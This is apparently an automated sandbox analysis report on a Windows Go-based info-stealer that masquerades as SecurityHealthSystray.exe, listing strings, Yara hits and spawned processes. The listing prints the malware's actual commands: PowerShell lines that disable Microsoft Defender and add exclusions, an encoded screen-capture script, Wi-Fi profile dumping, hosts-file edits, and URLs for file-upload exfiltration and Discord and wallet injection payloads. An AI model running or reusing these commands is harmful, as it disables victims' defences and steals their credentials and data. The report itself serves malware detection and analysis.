                      Source: SecurityHealthSystray.exe, 0000000D.00000002.1508066041.0000000000281000.00000040.00000001.01000000.00000007.sdmp, SecurityHealthSystray.exe, 00000016.00000002.1590941085.0000000000281000.00000040.00000001.01000000.00000007.sdmpString found in binary or memory: https://api.gofile.io/getServerhttps://%s.gofile.io/uploadFilesql:
                      Source: SecurityHealthSystray.exe, 0000000D.00000002.1508066041.0000000000281000.00000040.00000001.01000000.00000007.sdmp, SecurityHealthSystray.exe, 00000016.00000002.1590941085.0000000000281000.00000040.00000001.01000000.00000007.sdmpString found in binary or memory: https://api.ipify.org/-DisableIOAVProtection-DisableScriptScanning%s
                      Source: SecurityHealthSystray.exe, 0000000D.00000002.1508066041.0000000000281000.00000040.00000001.01000000.00000007.sdmp, SecurityHealthSystray.exe, 00000016.00000002.1590941085.0000000000281000.00000040.00000001.01000000.00000007.sdmpString found in binary or memory: https://avatars.githubusercontent.com/u/145487845?v=4sqlite:
                      Source: WdlA0C4PkO.exe, 00000000.00000003.2046786886.000000C0001A2000.00000004.00001000.00020000.00000000.sdmp, WdlA0C4PkO.exe, 00000000.00000003.2055924100.000000C0001EA000.00000004.00001000.00020000.00000000.sdmp, WdlA0C4PkO.exe, 00000000.00000003.2007680510.000000C0001EC000.00000004.00001000.00020000.00000000.sdmp, WdlA0C4PkO.exe, 00000000.00000003.2009215764.000000C0001EC000.00000004.00001000.00020000.00000000.sdmp, WdlA0C4PkO.exe, 00000000.00000003.1684148367.000000C0001EA000.00000004.00001000.00020000.00000000.sdmp, WdlA0C4PkO.exe, 00000000.00000003.1538095776.000000C0001EA000.00000004.00001000.00020000.00000000.sdmp, WdlA0C4PkO.exe, 00000000.00000003.3355671817.000000C0001EA000.00000004.00001000.00020000.00000000.sdmp, WdlA0C4PkO.exe, 00000000.00000003.2075882669.000000C0001EA000.00000004.00001000.00020000.00000000.sdmp, WdlA0C4PkO.exe, 00000000.00000003.2402745424.000000C0001EA000.00000004.00001000.00020000.00000000.sdmp, WdlA0C4PkO.exe, 00000000.00000003.1539272178.000000C0001A2000.00000004.00001000.00020000.00000000.sdmp, WdlA0C4PkO.exe, 00000000.00000003.1988403621.000000C0001EA000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://bugzilla.mo
                      Source: powershell.exe, 00000012.00000002.1726793119.000001FCA3582000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/
                      Source: powershell.exe, 00000012.00000002.1726793119.000001FCA3582000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/Icon
                      Source: powershell.exe, 00000012.00000002.1726793119.000001FCA3582000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/License
                      Source: SecurityHealthSystray.exe, 00000016.00000002.1590941085.0000000000281000.00000040.00000001.01000000.00000007.sdmpString found in binary or memory: https://discord.com/api/v9/users/
                      Source: powershell.exe, 00000012.00000002.1665126840.000001FC94E1B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/Pester/Pester
                      Source: SecurityHealthSystray.exe, 0000000D.00000002.1508066041.0000000000281000.00000040.00000001.01000000.00000007.sdmp, SecurityHealthSystray.exe, 00000016.00000002.1590941085.0000000000281000.00000040.00000001.01000000.00000007.sdmpString found in binary or memory: https://github.com/hackirby/wallets-injection/raw/main/atomic.asarhttps://github.com/hackirby/wallet
                      Source: powershell.exe, 00000012.00000002.1665126840.000001FC94145000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://go.micro
                      Source: SecurityHealthSystray.exe, 0000000D.00000002.1508066041.0000000000281000.00000040.00000001.01000000.00000007.sdmp, SecurityHealthSystray.exe, 00000016.00000002.1590941085.0000000000281000.00000040.00000001.01000000.00000007.sdmpString found in binary or memory: https://i.ibb.co/GFZ2tHJ/shakabaiano-1674282487.jpgJSON
                      Source: powershell.exe, 0000000C.00000002.1580104465.000001C995732000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000012.00000002.1726793119.000001FCA36C4000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000012.00000002.1665126840.000001FC94E76000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000012.00000002.1726793119.000001FCA3582000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://nuget.org/nuget.exe
                      Source: powershell.exe, 00000012.00000002.1665126840.000001FC94C75000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://oneget.org
                      Source: powershell.exe, 00000012.00000002.1665126840.000001FC94C75000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://oneget.orgX
                      Source: SecurityHealthSystray.exe, 0000000D.00000002.1508066041.0000000000281000.00000040.00000001.01000000.00000007.sdmp, SecurityHealthSystray.exe, 00000016.00000002.1590941085.0000000000281000.00000040.00000001.01000000.00000007.sdmpString found in binary or memory: https://raw.githubusercontent.com/hackirby/discord-injection/main/injection.js1157920892103562487626
                      Source: history.txt.0.drString found in binary or memory: https://www.mozilla.org/en-US/privacy/firefox/
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49707 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49707

                      Key, Mouse, Clipboard, Microphone and Screen Capturing

                      barindex
                      Yara detected Go Stealer
                      Source: Yara matchFile source: 22.2.SecurityHealthSystray.exe.280000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 13.2.SecurityHealthSystray.exe.280000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0000000D.00000002.1508066041.0000000000281000.00000040.00000001.01000000.00000007.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000016.00000002.1590941085.0000000000281000.00000040.00000001.01000000.00000007.sdmp, type: MEMORY
                      Source: Yara matchFile source: Process Memory Space: SecurityHealthSystray.exe PID: 7388, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: SecurityHealthSystray.exe PID: 3348, type: MEMORYSTR

                      Spam, unwanted Advertisements and Ransom Demands

                      barindex
                      Modifies the hosts file
                      Source: C:\Users\user\Desktop\WdlA0C4PkO.exeFile written: C:\Windows\System32\drivers\etc\hostsJump to behavior
                      Source: C:\Users\user\Desktop\WdlA0C4PkO.exeProcess Stats: CPU usage > 49%
                      Source: C:\Users\user\Desktop\WdlA0C4PkO.exeProcess created: Commandline size = 3614
                      Source: C:\Users\user\Desktop\WdlA0C4PkO.exeProcess created: Commandline size = 3614Jump to behavior
                      Source: classification engineClassification label: mal100.troj.adwa.spyw.expl.evad.winEXE@38/25@2/2
                      Source: C:\Users\user\Desktop\WdlA0C4PkO.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Protect\SecurityHealthSystray.exeJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMutant created: NULL
                      Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:604:120:WilError_03
                      Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7656:120:WilError_03
                      Source: C:\Users\user\Desktop\WdlA0C4PkO.exeMutant created: \Sessions\1\BaseNamedObjects\Global\3575651c-bb47-448e-a514-22865732bbc
                      Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7468:120:WilError_03
                      Source: C:\Users\user\Desktop\WdlA0C4PkO.exeFile created: C:\Users\user\AppData\Local\Temp\browsers-tempJump to behavior
                      Source: C:\Windows\System32\wbem\WMIC.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT Name FROM WIN32_PROCESSOR
                      Source: C:\Users\user\Desktop\WdlA0C4PkO.exeKey opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                      Source: C:\Users\user\Desktop\WdlA0C4PkO.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                      Source: SecurityHealthSystray.exe, 0000000D.00000002.1508066041.0000000000281000.00000040.00000001.01000000.00000007.sdmp, SecurityHealthSystray.exe, 00000016.00000002.1590941085.0000000000281000.00000040.00000001.01000000.00000007.sdmpBinary or memory string: UPDATE %Q.sqlite_master SET tbl_name = %Q, name = CASE WHEN type='table' THEN %Q WHEN name LIKE 'sqliteX_autoindex%%' ESCAPE 'X' AND type='index' THEN 'sqlite_autoindex_' || %Q || substr(name,%d+18) ELSE name END WHERE tbl_name=%Q COLLATE nocase AND (type='table' OR type='index' OR type='trigger');
                      Source: SecurityHealthSystray.exe, 0000000D.00000002.1508066041.0000000000281000.00000040.00000001.01000000.00000007.sdmp, SecurityHealthSystray.exe, 00000016.00000002.1590941085.0000000000281000.00000040.00000001.01000000.00000007.sdmpBinary or memory string: CREATE TABLE IF NOT EXISTS %s.'rbu_tmp_%q' AS SELECT *%s FROM '%q' WHERE 0;
                      Source: SecurityHealthSystray.exe, 0000000D.00000002.1508066041.0000000000281000.00000040.00000001.01000000.00000007.sdmp, SecurityHealthSystray.exe, 00000016.00000002.1590941085.0000000000281000.00000040.00000001.01000000.00000007.sdmpBinary or memory string: INSERT INTO %Q.sqlite_master VALUES('index',%Q,%Q,#%d,%Q);
                      Source: SecurityHealthSystray.exe, 0000000D.00000002.1508066041.0000000000281000.00000040.00000001.01000000.00000007.sdmp, SecurityHealthSystray.exe, 00000016.00000002.1590941085.0000000000281000.00000040.00000001.01000000.00000007.sdmpBinary or memory string: CREATE TABLE "%w"."%w_parent"(nodeno INTEGER PRIMARY KEY,parentnode);
                      Source: WdlA0C4PkO.exeReversingLabs: Detection: 55%
                      Source: C:\Users\user\Desktop\WdlA0C4PkO.exeFile read: C:\Users\user\Desktop\WdlA0C4PkO.exeJump to behavior
                      Source: unknownProcess created: C:\Users\user\Desktop\WdlA0C4PkO.exe "C:\Users\user\Desktop\WdlA0C4PkO.exe"
                      Source: C:\Users\user\Desktop\WdlA0C4PkO.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                      Source: C:\Users\user\Desktop\WdlA0C4PkO.exeProcess created: C:\Windows\System32\attrib.exe attrib +h +s C:\Users\user\Desktop\WdlA0C4PkO.exe
                      Source: C:\Users\user\Desktop\WdlA0C4PkO.exeProcess created: C:\Windows\System32\attrib.exe attrib +h +s C:\Users\user\AppData\Roaming\Microsoft\Protect\SecurityHealthSystray.exe
                      Source: C:\Users\user\Desktop\WdlA0C4PkO.exeProcess created: C:\Windows\System32\wbem\WMIC.exe wmic csproduct get UUID
                      Source: C:\Users\user\Desktop\WdlA0C4PkO.exeProcess created: C:\Windows\System32\wbem\WMIC.exe wmic path win32_VideoController get name
                      Source: C:\Users\user\Desktop\WdlA0C4PkO.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command Add-MpPreference -ExclusionPath C:\Users\user\Desktop\WdlA0C4PkO.exe
                      Source: C:\Users\user\Desktop\WdlA0C4PkO.exeProcess created: C:\Windows\System32\wbem\WMIC.exe wmic os get Caption
                      Source: C:\Users\user\Desktop\WdlA0C4PkO.exeProcess created: C:\Windows\System32\wbem\WMIC.exe wmic cpu get Name
                      Source: C:\Users\user\Desktop\WdlA0C4PkO.exeProcess created: C:\Windows\System32\wbem\WMIC.exe wmic path win32_VideoController get name
                      Source: C:\Users\user\Desktop\WdlA0C4PkO.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend
                      Source: unknownProcess created: C:\Users\user\AppData\Roaming\Microsoft\Protect\SecurityHealthSystray.exe "C:\Users\user\AppData\Roaming\Microsoft\Protect\SecurityHealthSystray.exe"
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Protect\SecurityHealthSystray.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                      Source: C:\Users\user\Desktop\WdlA0C4PkO.exeProcess created: C:\Windows\System32\wbem\WMIC.exe wmic csproduct get UUID
                      Source: C:\Users\user\Desktop\WdlA0C4PkO.exeProcess created: C:\Windows\System32\netsh.exe netsh wlan show profiles
                      Source: C:\Users\user\Desktop\WdlA0C4PkO.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIABT
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\a12sgnvo\a12sgnvo.cmdline"
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES41CB.tmp" "c:\Users\user\AppData\Local\Temp\a12sgnvo\CSC12900879E4FA4A8799F1D0272636A686.TMP"
                      Source: unknownProcess created: C:\Users\user\AppData\Roaming\Microsoft\Protect\SecurityHealthSystray.exe "C:\Users\user\AppData\Roaming\Microsoft\Protect\SecurityHealthSystray.exe"
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Protect\SecurityHealthSystray.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                      Source: C:\Users\user\Desktop\WdlA0C4PkO.exeProcess created: C:\Windows\System32\attrib.exe attrib -r C:\Windows\System32\drivers\etc\hosts
                      Source: C:\Users\user\Desktop\WdlA0C4PkO.exeProcess created: C:\Windows\System32\attrib.exe attrib +r C:\Windows\System32\drivers\etc\hosts
                      Source: C:\Users\user\Desktop\WdlA0C4PkO.exeProcess created: C:\Windows\System32\attrib.exe attrib +h +s C:\Users\user\Desktop\WdlA0C4PkO.exeJump to behavior
                      Source: C:\Users\user\Desktop\WdlA0C4PkO.exeProcess created: C:\Windows\System32\attrib.exe attrib +h +s C:\Users\user\AppData\Roaming\Microsoft\Protect\SecurityHealthSystray.exeJump to behavior
                      Source: C:\Users\user\Desktop\WdlA0C4PkO.exeProcess created: C:\Windows\System32\wbem\WMIC.exe wmic csproduct get UUIDJump to behavior
                      Source: C:\Users\user\Desktop\WdlA0C4PkO.exeProcess created: C:\Windows\System32\wbem\WMIC.exe wmic path win32_VideoController get nameJump to behavior
                      Source: C:\Users\user\Desktop\WdlA0C4PkO.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command Add-MpPreference -ExclusionPath C:\Users\user\Desktop\WdlA0C4PkO.exeJump to behavior
                      Source: C:\Users\user\Desktop\WdlA0C4PkO.exeProcess created: C:\Windows\System32\wbem\WMIC.exe wmic os get CaptionJump to behavior
                      Source: C:\Users\user\Desktop\WdlA0C4PkO.exeProcess created: C:\Windows\System32\wbem\WMIC.exe wmic cpu get NameJump to behavior
                      Source: C:\Users\user\Desktop\WdlA0C4PkO.exeProcess created: C:\Windows\System32\wbem\WMIC.exe wmic path win32_VideoController get nameJump to behavior
                      Source: C:\Users\user\Desktop\WdlA0C4PkO.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSendJump to behavior
                      Source: C:\Users\user\Desktop\WdlA0C4PkO.exeProcess created: C:\Windows\System32\wbem\WMIC.exe wmic csproduct get UUIDJump to behavior
                      Source: C:\Users\user\Desktop\WdlA0C4PkO.exeProcess created: C:\Windows\System32\netsh.exe netsh wlan show profilesJump to behavior
                      Source: C:\Users\user\Desktop\WdlA0C4PkO.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIABTJump to behavior
                      Source: C:\Users\user\Desktop\WdlA0C4PkO.exeProcess created: C:\Windows\System32\attrib.exe attrib -r C:\Windows\System32\drivers\etc\hostsJump to behavior
                      Source: C:\Users\user\Desktop\WdlA0C4PkO.exeProcess created: C:\Windows\System32\attrib.exe attrib +r C:\Windows\System32\drivers\etc\hostsJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\a12sgnvo\a12sgnvo.cmdline"
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES41CB.tmp" "c:\Users\user\AppData\Local\Temp\a12sgnvo\CSC12900879E4FA4A8799F1D0272636A686.TMP"
                      Source: C:\Users\user\Desktop\WdlA0C4PkO.exeSection loaded: apphelp.dllJump to behavior
                      Source: C:\Users\user\Desktop\WdlA0C4PkO.exeSection loaded: powrprof.dllJump to behavior
                      Source: C:\Users\user\Desktop\WdlA0C4PkO.exeSection loaded: umpdc.dllJump to behavior
                      Source: C:\Users\user\Desktop\WdlA0C4PkO.exeSection loaded: uxtheme.dllJump to behavior
                      Source: C:\Users\user\Desktop\WdlA0C4PkO.exeSection loaded: textshaping.dllJump to behavior
                      Source: C:\Users\user\Desktop\WdlA0C4PkO.exeSection loaded: iphlpapi.dllJump to behavior
                      Source: C:\Users\user\Desktop\WdlA0C4PkO.exeSection loaded: dhcpcsvc6.dllJump to behavior
                      Source: C:\Users\user\Desktop\WdlA0C4PkO.exeSection loaded: dhcpcsvc.dllJump to behavior
                      Source: C:\Users\user\Desktop\WdlA0C4PkO.exeSection loaded: dnsapi.dllJump to behavior
                      Source: C:\Users\user\Desktop\WdlA0C4PkO.exeSection loaded: mswsock.dllJump to behavior
                      Source: C:\Users\user\Desktop\WdlA0C4PkO.exeSection loaded: rasadhlp.dllJump to behavior
                      Source: C:\Users\user\Desktop\WdlA0C4PkO.exeSection loaded: kernel.appcore.dllJump to behavior
                      Source: C:\Users\user\Desktop\WdlA0C4PkO.exeSection loaded: textinputframework.dllJump to behavior
                      Source: C:\Users\user\Desktop\WdlA0C4PkO.exeSection loaded: coreuicomponents.dllJump to behavior
                      Source: C:\Users\user\Desktop\WdlA0C4PkO.exeSection loaded: coremessaging.dllJump to behavior
                      Source: C:\Users\user\Desktop\WdlA0C4PkO.exeSection loaded: ntmarta.dllJump to behavior
                      Source: C:\Users\user\Desktop\WdlA0C4PkO.exeSection loaded: coremessaging.dllJump to behavior
